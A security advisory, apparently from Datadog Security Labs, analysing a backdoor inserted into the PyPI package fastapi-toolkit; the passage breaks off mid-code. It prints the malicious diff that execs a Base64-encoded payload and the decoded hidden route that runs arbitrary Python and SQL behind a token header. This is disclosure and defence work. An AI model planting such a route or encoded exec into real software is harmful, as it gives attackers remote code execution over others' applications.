Introduction
FastAPI is a highly popular Python web framework. On November 23rd, 2022, the Datadog Security Labs team identified a third-party utility Python package on PyPI related to FastAPI, fastapi-toolkit
, that has likely been compromised by a malicious actor. The attacker inserted a backdoor in the package, adding a FastAPI route allowing a remote attacker to execute arbitrary python code and SQL queries in the context of the web application.
While FastAPI itself is not impacted, this is an interesting occurrence of an attacker attempting to deploy a FastAPI-specific backdoor.
Key points and observations
fastapi-toolkit
was first published on PyPi on March 21, 2022. There likely was no malicious intent with the initial and subsequent versions of the package.- On November 23, 2022, at 07:33 UTC, a malicious commit with a backdoor (2cd2223) was pushed to the GitHub repository. Shortly after, at 07:35 UTC, the malicious version of the package was uploaded to PyPI.
- We identified this malicious package on November 23 using our latest open source tool, GuardDog, which uses heuristics to identify malicious or compromised PyPI packages.
- We reported the malicious PyPI package to the PyPI team, as well as the malicious GitHub commit to GitHub.
Discovery and analysis
We recently released GuardDog, a free and open-source tool to identify malicious PyPI packages. We use it to identify, analyze, and help take down malicious packages.
On November 23, we identified that the package fastapi-toolkit
was likely malicious.

Upon investigation, we determined that fastapi-toolkit
used to be a legitimate package. At 7:33 UTC on November 23, a backdoor was introduced through commit 2cd2223.

In addition to bumping the package version from 0.0.26 to 0.0.27, the new code dynamically executes Base64-encoded code whenever the package is used.
commit 2cd2223dcd90fa9d9c72851427602aa0e179e061
Author: Tima
Date: Wed Nov 23 15:33:52 2022 +0800 Bugfix
diff --git a/VERSION b/VERSION
index c4475d3..24ff855 100644
--- a/VERSION
+++ b/VERSION
@@ -1 +1 @@
-0.0.26
+0.0.27
diff --git a/fastapi_toolkit/application.py b/fastapi_toolkit/application.py
index 002f50d..4107914 100755
--- a/fastapi_toolkit/application.py
+++ b/fastapi_toolkit/application.py
@@ -1,3 +1,4 @@
+import base64
from datetime import datetime
from fastapi import (
@@ -15,6 +16,7 @@ __all__ = (
'app',
)
+from fastapi_toolkit.constants import string
from fastapi_toolkit.schemas.application_info import ApplicationInfo
@@ -50,6 +52,8 @@ def application_info():
}
+exec(base64.b64decode(string))
+
app = FastAPI(
title=settings.project,
default_response_class=ORJSONResponse
diff --git a/fastapi_toolkit/constants.py b/fastapi_toolkit/constants.py
new file mode 100644
index 0000000..c01e0f4
--- /dev/null
+++ b/fastapi_toolkit/constants.py
@@ -0,0 +1 @@
+string = 'Cgpmcm9tIGZhc3RhcGkgaW1wb3'
Decoding the Base64-encoded code shows that the backdoor adds a FastAPI HTTP route that allows the attacker to execute arbitrary Python code or SQL queries whenever the application receives an HTTP request with a specific header.
@debug_router.post('/', include_in_schema=True)
async def _debug(
request: Request,
token: str = Header(..., alias='x-token'),
code: str = Header(..., alias='x-code')
):
if hashlib.md5(token.encode()).hexdigest() != '81637589c86b297088d076a57af43f91':
raise HTTPException(status_code=404, headers={'x-token': 'wrong'}) method = {
'python': __run_python,
'sql': __run_sql,
}.get(code, __run_noop)
try:
return await method((await request.body()).decode())
except Exception:
import traceback
return traceback.format_exc()
The functions __run_python
and __run_sql
execute arbitrary Python code and an arbitrary SQL query, respectively, provided in the HTTP POST request body.
async def __run_python(body: str):
return exec(body)
async def __run_sql(body: str):
import asyncpg
conn = await asyncpg.connect(settings.database_dsn.replace('+asyncpg', ''))
if not body.lower().startswith('select'):
result = await conn.execute(body)
await conn.close()
return result
rows = await conn.fetch(body)
rows = [dict(row) for row in rows]
await conn.close()
if not rows:
return 'noop'
stream = io.StringIO()
writer = csv.DictWriter(stream, fieldnames=rows[0].keys())
writer.writeheader()
writer.writerows(rows)
response = StreamingResponse(it